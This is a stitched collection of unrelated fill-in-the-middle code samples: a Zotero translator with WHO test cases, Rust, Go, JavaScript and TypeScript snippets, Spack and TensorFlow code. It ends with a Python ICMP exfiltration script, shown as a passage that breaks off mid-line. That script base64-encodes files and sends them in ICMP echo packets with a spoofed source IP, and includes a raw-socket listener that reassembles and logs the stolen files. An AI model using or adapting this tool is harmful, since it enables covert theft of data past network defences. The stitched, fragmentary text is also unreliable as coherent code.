items : false; } function doWeb(doc, url) { if (detectWeb(doc, url) == "multiple") { Zotero.selectItems(getSearchResults(doc, false), function (items) { if (!items) { return true; } var articles = []; for (var i in items) { articles.push(i); } ZU.processDocuments(articles, scrape); }); } else { scrape(doc, url); } } function scrape(doc, url) { // copy meta tags in body to head var head = doc.getElementsByTagName('head'); var metasInBody = ZU.xpath(doc, '//body/meta'); for (let meta of metasInBody) { head[0].append(meta); } var type = detectWeb(doc, url); var translator = Zotero.loadTranslator('web'); // Embedded Metadata translator.setTranslator('951c027d-74ac-47d4-a107-9c3069ab7b48'); translator.setHandler('itemDone', function (obj, item) { if (item.publisher && !item.place && item.publisher.includes(' : ')) { let placePublisher = item.publisher.split(' : '); item.place = placePublisher[0]; item.publisher = placePublisher[1]; } var firstAuthor = attr(doc, 'meta[name="DC.creator"]', 'content'); if (firstAuthor && !firstAuthor.includes(',')) { item.creators[0] = { "lastName": firstAuthor, "creatorType": "author", "fieldMode": true }; } var descriptions = doc.querySelectorAll('meta[name="DC.description"]'); // DC.description doesn't actually contain other useful content, // except possibly the number of pages for (let description of descriptions) { var numPages = description.content.match(/(([lxiv]+,\s*)?\d+)\s*p/); if (numPages) { if (ZU.fieldIsValidForType("numPages", item.itemType)) { item.numPages = numPages[1]; } else if (!item.extra) { item.extra = "number-of-pages: " + numPages[1]; } else { item.extra += "\nnumber-of-pages: " + numPages[1]; } delete item.abstractNote; } } item.complete(); }); translator.getTranslatorObject(function(trans) { trans.itemType = type; trans.doWeb(doc, url); }); } /** BEGIN TEST CASES **/ var testCases = [ { "type": "web", "url": "http://apps.who.int/iris/handle/10665/70863?locale=ar", "items": [ { "itemType": "report", "title": "Consensus document on the epidemiology of severe acute respiratory syndrome (SARS)", "creators": [ { "lastName": "World Health Organization", "creatorType": "author", "fieldMode": true } ], "date": "2003", "extra": "number-of-pages: 46", "institution": "World Health Organization", "language": "en", "libraryCatalog": "apps.who.int", "place": "Geneva", "reportNumber": "WHO/CDS/CSR/GAR/2003.11", "url": "http://apps.who.int/iris/handle/10665/70863", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" } ], "tags": [ { "tag": "Communicable Diseases and their Control" }, { "tag": "Disease outbreaks" }, { "tag": "Epidemiologic surveillance" }, { "tag": "Severe acute respiratory syndrome" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/272081", "items": [ { "itemType": "journalArticle", "title": "Providing oxygen to children in hospitals: a realist review", "creators": [ { "firstName": "Hamish", "lastName": "Graham", "creatorType": "author" }, { "firstName": "Shidan", "lastName": "Tosif", "creatorType": "author" }, { "firstName": "Amy", "lastName": "Gray", "creatorType": "author" }, { "firstName": "Shamim", "lastName": "Qazi", "creatorType": "author" }, { "firstName": "Harry", "lastName": "Campbell", "creatorType": "author" }, { "firstName": "David", "lastName": "Peel", "creatorType": "author" }, {<|fim▁hole|> "firstName": "Barbara", "lastName": "McPake", "creatorType": "author" }, { "firstName": "Trevor", "lastName": "Duke", "creatorType": 
"author" } ], "date": "2017-4-01", "DOI": "10.2471/BLT.16.186676", "ISSN": "0042-9686", "abstractNote": "288", "extra": "PMID: 28479624", "issue": "4", "language": "en", "libraryCatalog": "apps.who.int", "pages": "288-302", "publicationTitle": "Bulletin of the World Health Organization", "rights": "http://creativecommons.org/licenses/by/3.0/igo/legalcode", "shortTitle": "Providing oxygen to children in hospitals", "url": "http://apps.who.int/iris/handle/10665/272081", "volume": "95", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" }, { "title": "PubMed entry", "mimeType": "text/html", "snapshot": false } ], "tags": [ { "tag": "Systematic Reviews" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/273678", "items": [ { "itemType": "book", "title": "Сборник руководящих принципов и стандартов ВОЗ: обеспечение оптимального оказания медицинских услуг пациентам с туберкулезом", "creators": [ { "lastName": "Всемирная организация здравоохранения", "creatorType": "author", "fieldMode": true } ], "date": "2018", "ISBN": "9789244514108", "language": "ru", "libraryCatalog": "apps.who.int", "numPages": "47", "publisher": "Всемирная организация здравоохранения", "rights": "CC BY-NC-SA 3.0 IGO", "shortTitle": "Сборник руководящих принципов и стандартов ВОЗ", "url": "http://apps.who.int/iris/handle/10665/273678", "attachments": [ { "title": "Full Text PDF", "mimeType": "application/pdf" }, { "title": "Snapshot" } ], "tags": [ { "tag": "Delivery of Health Care" }, { "tag": "Disease Management" }, { "tag": "Guideline" }, { "tag": "Infection Control" }, { "tag": "Multidrug-Resistant" }, { "tag": "Patient Care" }, { "tag": "Reference Standards" }, { "tag": "Tuberculosis" } ], "notes": [], "seeAlso": [] } ] }, { "type": "web", "url": "http://apps.who.int/iris/handle/10665/165097", "items": "multiple" }, { "type": "web", "url": "http://apps.who.int/iris/discover?query=acupuncture", "items": "multiple" } ]; /** END TEST CASES **/<|fim▁end|>
<|file_name|>borrowck-return-variable-on-stack-via-clone.rs<|end_file_name|><|fim▁begin|>// Check that when we clone a `&T` pointer we properly relate the // lifetime of the pointer which results to the pointer being cloned. // Bugs in method resolution have sometimes broken this connection. // Issue #19261. <|fim▁hole|> fn main() { }<|fim▁end|>
fn leak<'a, T>(x: T) -> &'a T { (&x).clone() //~ ERROR cannot return value referencing function parameter `x` }
<|file_name|>index.js<|end_file_name|><|fim▁begin|>var express = require('express') var app = module.exports = express() <|fim▁hole|><|fim▁end|>
app.get('/404', require('lib/site/layout')) app.get('*', function (req, res) { res.redirect('/404') })
<|file_name|>PhRequest.ts<|end_file_name|><|fim▁begin|>import { PaymentHighwayUtility } from '../../PaymentHighwayUtility';<|fim▁hole|> public requestId: string; constructor() { this.requestId = PaymentHighwayUtility.createRequestId(); } }<|fim▁end|>
export class Request {
<|file_name|>joins.py<|end_file_name|><|fim▁begin|>from enum import Enum from typing import Union, List, Optional from .space2d import * from .space3d import * class JoinTypes(Enum): """ Enumeration for Line and Segment type. """ START_START = 1 # start point coincident with start point START_END = 2 # start point coincident with end point END_START = 3 # end point coincident with start point END_END = 4 # end point coincident with end point def analizeJoins2D( first: Union[Line2D, Segment2D], second: Union[Line2D, Segment2D] ) -> List[Optional[JoinTypes]]: """ Analyze join types between two lines/segments. :param first: a line or segment. :param second: a line or segment. :return: a list of join types. Examples: >>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0)) >>> second = Segment2D(Point2D(x=1,y=0), Point2D(x=0,y=0)) >>> analizeJoins2D(first, second) [<JoinTypes.START_END: 2>, <JoinTypes.END_START: 3>] >>> first = Segment2D(Point2D(x=0,y=0), Point2D(x=1,y=0)) >>> second = Segment2D(Point2D(x=2,y=0), Point2D(x=3,y=0)) >>> analizeJoins2D(first, second) []<|fim▁hole|> join_types = [] if first.start_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.START_START) if first.start_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.START_END) if first.end_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.END_START) if first.end_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.END_END) return join_types def analizeJoins3D( first: Union[Line3D, Segment3D], second: Union[Line3D, Segment3D] ) -> List[Optional[JoinTypes]]: """ Analyze join types between two lines/segments. :param first: a line or segment. :type first: Line or Segment. :param second: a line or segment. :param second: Line or Segment. :return: a list of join types. :rtype: List[Optional[JoinTypes]]. Examples: """ join_types = [] if first.start_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.START_START) if first.start_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.START_END) if first.end_pt.is_coincident(second.start_pt): join_types.append(JoinTypes.END_START) if first.end_pt.is_coincident(second.end_pt): join_types.append(JoinTypes.END_END) return join_types<|fim▁end|>
"""
<|file_name|>kailua-check-test.rs<|end_file_name|><|fim▁begin|>#[macro_use] extern crate log; extern crate env_logger; extern crate clap; extern crate kailua_test; extern crate kailua_env; extern crate kailua_diag; extern crate kailua_syntax; extern crate kailua_types; extern crate kailua_check; use std::str; use std::usize; use std::cell::RefCell; use std::rc::Rc; use std::collections::HashMap; use clap::{App, Arg, ArgMatches}; use kailua_env::{Source, Span, Spanned}; use kailua_diag::{Stop, Locale, Report, Reporter, TrackMaxKind}; use kailua_syntax::{Chunk, parse_chunk}; use kailua_types::ty::{TypeContext, Display}; use kailua_check::check_from_chunk; use kailua_check::options::Options; use kailua_check::env::Context; struct Testing { note_spanned_infos: bool, } impl Testing { fn new() -> Testing { Testing { note_spanned_infos: false } } } impl kailua_test::Testing for Testing { fn augment_args<'a, 'b: 'a>(&self, app: App<'a, 'b>) -> App<'a, 'b> { app.arg( Arg::with_name("note_spanned_infos") .short("s") .long("note-spanned-infos") .help("Displays a list of spanned informations.\n\ Only useful when used with `--exact-diags`.")) } fn collect_args<'a>(&mut self, matches: &ArgMatches<'a>) { self.note_spanned_infos = matches.is_present("note_spanned_infos"); } fn run(&self, source: Rc<RefCell<Source>>, span: Span, filespans: &HashMap<String, Span>, report: Rc<Report>) -> String { let chunk = match parse_chunk(&source.borrow(), span, &*report) { Ok(chunk) => chunk, Err(_) => return format!("parse error"), }; struct Opts { source: Rc<RefCell<Source>>, filespans: HashMap<String, Span>, } impl Options for Opts { fn require_chunk(&mut self, path: Spanned<&[u8]>, report: &Report) -> Result<Chunk, Option<Stop>> { let path = str::from_utf8(&path).map_err(|_| None)?; let span = *self.filespans.get(path).ok_or(None)?; parse_chunk(&self.source.borrow(), span, report).map_err(|_| None) } } let report = Rc::new(TrackMaxKind::new(report)); let opts = Rc::new(RefCell::new(Opts { source: source, filespans: filespans.clone() })); let mut context = Context::new(report.clone()); let ret = check_from_chunk(&mut context, chunk, opts); // spanned information is available even on error if self.note_spanned_infos { let mut slots: Vec<_> = context.spanned_slots().iter().collect(); slots.sort_by_key(|slot| { (slot.span.unit(), slot.span.end().to_usize(), usize::MAX - slot.span.begin().to_usize()) }); for slot in slots { let msg = format!("slot: {}", slot.display(context.types() as &TypeContext) .localized(Locale::dummy())); report.info(slot.span, &msg).done().unwrap(); } } match ret { Ok(()) => { if report.can_continue() { format!("ok") } else { info!("check failed due to prior errors"); format!("error") } },<|fim▁hole|> info!("check failed: {:?}", e); format!("error") }, } } } fn main() { env_logger::init().unwrap(); kailua_test::Tester::new("kailua-check-test", Testing::new()) .feature("no_implicit_func_sig", cfg!(feature = "no_implicit_func_sig")) .feature("warn_on_useless_conds", cfg!(feature = "warn_on_useless_conds")) .feature("warn_on_dead_code", cfg!(feature = "warn_on_dead_code")) .scan("src/tests") .done(); }<|fim▁end|>
Err(e) => {
<|file_name|>cambridgeaudio.py<|end_file_name|><|fim▁begin|>""" Discover Cambridge Audio StreamMagic devices. """ from . import SSDPDiscoverable class Discoverable(SSDPDiscoverable): """Add support for discovering Cambridge Audio StreamMagic devices.""" def get_entries(self): """Get all Cambridge Audio MediaRenderer uPnP entries.""" return self.find_by_device_description({<|fim▁hole|> })<|fim▁end|>
"manufacturer": "Cambridge Audio", "deviceType": "urn:schemas-upnp-org:device:MediaRenderer:1"
<|file_name|>tableDetail.js<|end_file_name|><|fim▁begin|>/* * Copyright 2017-present Open Networking Foundation * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ /* ONOS GUI -- Widget -- Table Detail Panel Service */ (function () { 'use strict'; // injected refs var $log, $interval, $timeout, fs, wss; // constants // var refreshInterval = 2000; function noop() {} // TODO: describe the input object for the main function // example params to (functionX): // { // ... // } function buildBasePanel(opts) { var popTopF = fs.isF(opts.popTop) || noop, popMidF = fs.isF(opts.popMid) || noop, popBotF = fs.isF(opts.popBot) || noop;<|fim▁hole|> // TODO: create divs, and pass into invocations of popTopF(div), etc. } // more functions // TODO: add ref to PanelService angular.module('onosWidget') .factory('TableDetailService', ['$log', '$interval', '$timeout', 'FnService', 'WebSocketService', function (_$log_, _$interval_, _$timeout_, _fs_, _wss_) { $log = _$log_; $interval = _$interval_; $timeout = _$timeout_; fs = _fs_; wss = _wss_; return { buildBasePanel: buildBasePanel }; }]); }());<|fim▁end|>
$log.debug('options are', opts); // TODO use panel service to create base panel
<|file_name|>client.go<|end_file_name|><|fim▁begin|>// Copyright Project Harbor Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package core import ( "fmt" modelsv2 "github.com/goharbor/harbor/src/controller/artifact" "net/http" "github.com/goharbor/harbor/src/chartserver" chttp "github.com/goharbor/harbor/src/common/http" "github.com/goharbor/harbor/src/common/http/modifier" ) // Client defines the methods that a core client should implement // Currently, it contains only part of the whole method collection // and we should expand it when needed type Client interface { ArtifactClient ChartClient } // ArtifactClient defines the methods that an image client should implement type ArtifactClient interface {<|fim▁hole|> DeleteArtifact(project, repository, digest string) error DeleteArtifactRepository(project, repository string) error } // ChartClient defines the methods that a chart client should implement type ChartClient interface { ListAllCharts(project, repository string) ([]*chartserver.ChartVersion, error) DeleteChart(project, repository, version string) error DeleteChartRepository(project, repository string) error } // New returns an instance of the client which is a default implement for Client func New(url string, httpclient *http.Client, authorizer modifier.Modifier) Client { return &client{ url: url, httpclient: chttp.NewClient(httpclient, authorizer), } } type client struct { url string httpclient *chttp.Client } func (c *client) buildURL(path string) string { return fmt.Sprintf("%s%s", c.url, path) }<|fim▁end|>
ListAllArtifacts(project, repository string) ([]*modelsv2.Artifact, error)
<|file_name|>closing-channels.go<|end_file_name|><|fim▁begin|>package main import ( "fmt" ) func main() { jobs := make(chan int, 5)<|fim▁hole|> for { j, more := <-jobs if more { fmt.Println("received job", j) } else { fmt.Println("received all jobs") done <- true return } } }() for j := 1; j <= 3; j++ { jobs <- j fmt.Println("sent job", j) } close(jobs) fmt.Println("sent all jobs") <-done }<|fim▁end|>
done := make(chan bool) go func() {
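The Go sample signals "no more jobs" by closing the channel, which makes the two-value receive `j, more := <-jobs` report `more == false`. A rough Python analogue of the same pattern, sketched with `queue.Queue` and a sentinel object standing in for channel closure (an assumption; Python queues have no native close):

import queue
import threading

SENTINEL = object()  # stands in for a closed channel

def worker(jobs, done):
    while True:
        j = jobs.get()
        if j is SENTINEL:
            print("received all jobs")
            done.put(True)
            return
        print("received job", j)

jobs = queue.Queue(maxsize=5)
done = queue.Queue()
threading.Thread(target=worker, args=(jobs, done)).start()

for j in range(1, 4):
    jobs.put(j)
    print("sent job", j)
jobs.put(SENTINEL)  # analogous to close(jobs)
print("sent all jobs")
done.get()          # analogous to <-done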
<|file_name|>sparsemax.py<|end_file_name|><|fim▁begin|># Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Sparsemax op.""" <|fim▁hole|>from __future__ import print_function from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.ops import array_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn __all__ = ["sparsemax"] def sparsemax(logits, name=None): """Computes sparsemax activations [1]. For each batch `i` and class `j` we have $$sparsemax[i, j] = max(logits[i, j] - tau(logits[i, :]), 0)$$ [1]: https://arxiv.org/abs/1602.02068 Args: logits: A `Tensor`. Must be one of the following types: `half`, `float32`, `float64`. name: A name for the operation (optional). Returns: A `Tensor`. Has the same type as `logits`. """ with ops.name_scope(name, "sparsemax", [logits]) as name: logits = ops.convert_to_tensor(logits, name="logits") obs = array_ops.shape(logits)[0] dims = array_ops.shape(logits)[1] # In the paper, they call the logits z. # The mean(logits) can be substracted from logits to make the algorithm # more numerically stable. the instability in this algorithm comes mostly # from the z_cumsum. Substacting the mean will cause z_cumsum to be close # to zero. However, in practise the numerical instability issues are very # minor and substacting the mean causes extra issues with inf and nan # input. z = logits # sort z z_sorted, _ = nn.top_k(z, k=dims) # calculate k(z) z_cumsum = math_ops.cumsum(z_sorted, axis=1) k = math_ops.range( 1, math_ops.cast(dims, logits.dtype) + 1, dtype=logits.dtype) z_check = 1 + k * z_sorted > z_cumsum # because the z_check vector is always [1,1,...1,0,0,...0] finding the # (index + 1) of the last `1` is the same as just summing the number of 1. k_z = math_ops.reduce_sum(math_ops.cast(z_check, dtypes.int32), axis=1) # calculate tau(z) # If there are inf values or all values are -inf, the k_z will be zero, # this is mathematically invalid and will also cause the gather_nd to fail. # Prevent this issue for now by setting k_z = 1 if k_z = 0, this is then # fixed later (see p_safe) by returning p = nan. This results in the same # behavior as softmax. k_z_safe = math_ops.maximum(k_z, 1) indices = array_ops.stack([math_ops.range(0, obs), k_z_safe - 1], axis=1) tau_sum = array_ops.gather_nd(z_cumsum, indices) tau_z = (tau_sum - 1) / math_ops.cast(k_z, logits.dtype) # calculate p p = math_ops.maximum( math_ops.cast(0, logits.dtype), z - tau_z[:, array_ops.newaxis]) # If k_z = 0 or if z = nan, then the input is invalid p_safe = array_ops.where( math_ops.logical_or( math_ops.equal(k_z, 0), math_ops.is_nan(z_cumsum[:, -1])), array_ops.fill([obs, dims], math_ops.cast(float("nan"), logits.dtype)), p) return p_safe<|fim▁end|>
from __future__ import absolute_import from __future__ import division
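The TensorFlow graph above implements the sparsemax projection of Martins & Astudillo (arXiv:1602.02068): sort the logits, find the support size k(z), derive the threshold tau(z), and clip. The same arithmetic for a single row in plain NumPy — a sketch for intuition only, without the sample's NaN/inf guards:

import numpy as np

def sparsemax_1d(z):
    z_sorted = np.sort(z)[::-1]              # sort logits in decreasing order
    k = np.arange(1, z.size + 1)
    z_cumsum = np.cumsum(z_sorted)
    support = 1 + k * z_sorted > z_cumsum    # same predicate as z_check in the sample
    k_z = k[support][-1]                     # support size k(z)
    tau_z = (z_cumsum[k_z - 1] - 1) / k_z    # threshold tau(z)
    return np.maximum(z - tau_z, 0.0)        # clipped result sums to 1

p = sparsemax_1d(np.array([1.0, 2.2, 0.1]))
print(p, p.sum())  # [0. 1. 0.] 1.0 -- sparser than softmax on the same logits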
<|file_name|>package.py<|end_file_name|><|fim▁begin|>############################################################################## # Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC. # Produced at the Lawrence Livermore National Laboratory. # # This file is part of Spack. # Created by Todd Gamblin, [email protected], All rights reserved. # LLNL-CODE-647188 # # For details, see https://github.com/llnl/spack # Please also see the NOTICE and LICENSE files for our notice and the LGPL. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License (as # published by the Free Software Foundation) version 2.1, February 1999. # # This program is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and # conditions of the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA ############################################################################## from spack import * <|fim▁hole|> homepage = "http://genome.sph.umich.edu/wiki/FastQValidator" url = "https://github.com/statgen/fastQValidator/archive/v0.1.1a.tar.gz" version('2017-01-10', commit='6d619a34749e9d33c34ef0d3e0e87324ca77f320', git='https://github.com/statgen/fastQValidator.git') resource( name='libStatGen', git='https://github.com/statgen/libStatGen.git', commit='9db9c23e176a6ce6f421a3c21ccadedca892ac0c' ) @property def build_targets(self): return ['LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen'))] @property def install_targets(self): return [ 'INSTALLDIR={0}'.format(self.prefix.bin), 'LIB_PATH_GENERAL={0}'.format( join_path(self.stage.source_path, 'libStatGen')), 'install' ]<|fim▁end|>
class Fastqvalidator(MakefilePackage): """The fastQValidator validates the format of fastq files."""
<|file_name|>EventInSFImage.java<|end_file_name|><|fim▁begin|>package vrml.external.field; import vrml.external.field.FieldTypes; import vrml.external.Browser; import java.awt.*; import java.math.BigInteger; public class EventInSFImage extends EventIn { public EventInSFImage() { EventType = FieldTypes.SFIMAGE; } public void setValue(int width, int height, int components, byte[] pixels) throws IllegalArgumentException { int count; int pixcount; String val; BigInteger newval; byte xx[]; if (pixels.length != (width*height*components)) { throw new IllegalArgumentException(); } if ((components < 1) || (components > 4)) { throw new IllegalArgumentException(); } // use BigInt to ensure sign bit does not frick us up. xx = new byte[components+1]; xx[0] = (byte) 0; // no sign bit here! val = new String("" + width + " " + height + " " + components); if (pixels== null) { pixcount = 0;} else {pixcount=pixels.length;} if (components == 1) {<|fim▁hole|> newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 2) { for (count = 0; count < pixcount; count+=2) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 3) { for (count = 0; count < pixcount; count+=3) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; xx[3]=pixels[count+2]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } if (components == 4) { for (count = 0; count < pixcount; count+=4) { xx[1] = pixels[count]; xx[2] = pixels[count+1]; xx[3]=pixels[count+2]; xx[4]=pixels[count+3]; newval = new BigInteger(xx); //System.out.println ("Big int " + newval.toString(16)); val = val.concat(" 0x" + newval.toString(16)); } } //System.out.println ("sending " + val); Browser.newSendEvent (this, val.length() + ":" + val + " "); return; } }<|fim▁end|>
for (count = 0; count < pixcount; count++) { xx[1] = pixels[count];
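The Java sample prepends a zero byte (`xx[0] = 0`, "no sign bit here!") before handing pixel bytes to `BigInteger`, forcing an unsigned interpretation so components like `0xFF` do not render as negative hex. The same effect side by side in Python, where `int.from_bytes(..., signed=False)` gives the unsigned reading directly (illustrative only):

pixel = bytes([0xFF])  # a single 8-bit pixel component

signed = int.from_bytes(pixel, "big", signed=True)    # -1: the sign-bit problem
unsigned = int.from_bytes(b"\x00" + pixel, "big")     # 255: the zero-byte trick
direct = int.from_bytes(pixel, "big", signed=False)   # 255: Python's native answer

print(signed, hex(unsigned), hex(direct))             # -1 0xff 0xff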
<|file_name|>spread.js<|end_file_name|><|fim▁begin|>// function add(a, b){ // return a+b; // } // // console.log(add(3,1)); // // var toAdd = [9, 5]; // console.log(add(...toAdd)); // var groupA = ['Jen', 'Cory']; // var groupB = ['Vikram'];<|fim▁hole|>// console.log(...final); var person = ['Andew', 25]; var personTwo = ['Jen', 29]; function greetingAge(a, b){ return 'Hi '+a+', you are '+ b; } console.log(greetingAge(...person)); console.log(greetingAge(...personTwo)); var names = ['Mike', 'Ben']; var final = ['Quentin', ...names]; for(i in final){ console.log('Hi '+ final[i]); }<|fim▁end|>
// var final = [...groupB, 3, ...groupA];
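The spread.js sample's `greetingAge(...person)` and `['Quentin', ...names]` map directly onto Python argument unpacking and literal unpacking — a quick analogue (names are my own; the sketch is not the JS tutorial's code):

person = ["Andrew", 25]
person_two = ["Jen", 29]

def greeting_age(name, age):
    return f"Hi {name}, you are {age}"

print(greeting_age(*person))      # *list unpacks in a call, like JS spread
print(greeting_age(*person_two))

names = ["Mike", "Ben"]
final = ["Quentin", *names]       # literal unpacking, like ['Quentin', ...names]
for name in final:
    print("Hi " + name)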
<|file_name|>vis.js<|end_file_name|><|fim▁begin|>version https://git-lfs.github.com/spec/v1 oid sha256:467bccdb74ef62e6611ba27f338a0ba0c49ba9a90ef1facb394c14de676318cf<|fim▁hole|><|fim▁end|>
size 1150464
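The `vis.js` sample above is not JavaScript at all but a Git LFS pointer file: three `key value` lines (`version`, `oid`, `size`) that stand in for the real 1.1 MB blob. A tiny parser, assuming the three-line form shown in the sample:

def parse_lfs_pointer(text):
    """Parse a Git LFS pointer file into a dict of its key/value lines."""
    fields = dict(line.split(" ", 1) for line in text.strip().splitlines())
    fields["size"] = int(fields["size"])         # byte size of the real blob
    algo, digest = fields["oid"].split(":", 1)   # e.g. sha256:<hex digest>
    fields["oid"] = (algo, digest)
    return fields

pointer = """version https://git-lfs.github.com/spec/v1
oid sha256:467bccdb74ef62e6611ba27f338a0ba0c49ba9a90ef1facb394c14de676318cf
size 1150464
"""
print(parse_lfs_pointer(pointer)["size"])  # 1150464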
<|file_name|>icmp_exfiltration.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python import os import sys import zlib import time import datetime<|fim▁hole|>from impacket import ImpactPacket """ Constants """ READ_BINARY = "rb" WRITE_BINARY = "wb" READ_FROM_SOCK = 7000 ICMP_HEADER_SIZE = 27 DATA_SEPARATOR = "::" DATA_TERMINATOR = "\x12\x13\x14\x15" INIT_PACKET = "\x12\x11\x13\x12\x12\x12" END_PACKET = "\x15\x14\x13\x12" LOGFILE_BASENAME = "icmp_log" LOGFILE_EXT = ".txt" def send_file(ip_addr, src_ip_addr="127.0.0.1", file_path="", max_packetsize=512, SLEEP=0.1): """ send_file will send a file to the ip_addr given. A file path is required to send the file. Max packet size can be determined automatically. :param ip_addr: IP Address to send the file to. :param src_ip_addr: IP Address to spoof from. Default it 127.0.0.1. :param file_path: Path of the file to send. :param max_packetsize: Max packet size. Default is 512. :return: """ if file_path == "": sys.stderr.write("No file path given.\n") return -1 # Load file fh = open(file_path, READ_BINARY) iAmFile = fh.read() fh.close() # Create Raw Socket s = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) s.setsockopt(IPPROTO_IP, IP_HDRINCL, 1) # Create IP Packet ip = ImpactPacket.IP() ip.set_ip_src(src_ip_addr) ip.set_ip_dst(ip_addr) # ICMP on top of IP icmp = ImpactPacket.ICMP() icmp.set_icmp_type(icmp.ICMP_ECHO) seq_id = 0 # Calculate File: IamDone = base64.b64encode(iAmFile) # Base64 Encode for ASCII checksum = zlib.crc32(IamDone) # Build CRC for the file # Fragmentation of DATA x = len(IamDone) / max_packetsize y = len(IamDone) % max_packetsize # Get file name from file path: head, tail = os.path.split(file_path) # Build stream initiation packet current_packet = "" current_packet += tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(x + 2) + DATA_TERMINATOR + INIT_PACKET icmp.contains(ImpactPacket.Data(current_packet)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Iterate over the file for i in range(1, x + 2): str_send = IamDone[max_packetsize * (i - 1): max_packetsize * i] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) seq_id += 1 # Add last section str_send = IamDone[max_packetsize * i:max_packetsize * i + y] + DATA_TERMINATOR icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) time.sleep(SLEEP) # Send termination package str_send = (tail + DATA_SEPARATOR + str(checksum) + DATA_SEPARATOR + str(seq_id) + DATA_TERMINATOR + END_PACKET) icmp.contains(ImpactPacket.Data(str_send)) ip.contains(icmp) seq_id += 1 icmp.set_icmp_id(seq_id) icmp.set_icmp_cksum(0) icmp.auto_checksum = 1 s.sendto(ip.get_packet(), (ip_addr, 0)) return 0 def init_listener(ip_addr, saving_location="."): """ init_listener will start a listener for incoming ICMP packets on a specified ip_addr to receive the packets. It will then save a log file and the incoming information to the given path. If none given it will generate one itself. :param ip_addr: The local IP address to bind the listener to. :return: Nothing. """ # Trying to open raw ICMP socket. 
# If fails, you're probably just not root try: sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP) sock.bind(('', 1)) sys.stdout.write("Now listening...\n") except: sys.stderr.write("Could not start listening.\nProbably not root.\n") raise # Resetting counters files_received = 0 i = 0 current_file = "" # init log file: current_time_as_string = str(datetime.datetime.now()).replace(":",".").replace(" ", "-")[:-7] log_fh = open(LOGFILE_BASENAME + current_time_as_string + LOGFILE_EXT, WRITE_BINARY) log_fh.write("Started logging at %s\n\n" % current_time_as_string) while True: # Extract data from IP header data = sock.recv(READ_FROM_SOCK) # Get data ip_header = data[:20] # Extract IP Header # Get IP ips = ip_header[-8:-4] source = "%i.%i.%i.%i" % (ord(ips[0]), ord(ips[1]), ord(ips[2]), ord(ips[3])) # Ignore everything but ECHO requests if data[20] != "\x08": pass elif data[28:].find(INIT_PACKET) != -1: # Extract data from Initiation packet: man_string = data[28:] # String to manipulate man_array = man_string.split(DATA_SEPARATOR) # Exploit data into array filename = man_array[0] checksum = man_array[1] amount_of_packets = man_array[2] # Document to log file log_fh.write("Received file:\n") log_fh.write("\tFile name:\t%s\n" % filename) log_fh.write("\tIncoming from:\t%s\n" % source) log_fh.write("\tFile checksum:\t%s\n" % checksum) log_fh.write("\tIn Packets:\t%s\n" % amount_of_packets) log_fh.write("\tIncoming at:\t%s\n" % str(datetime.datetime.now()).replace(":", ".").replace(" ", 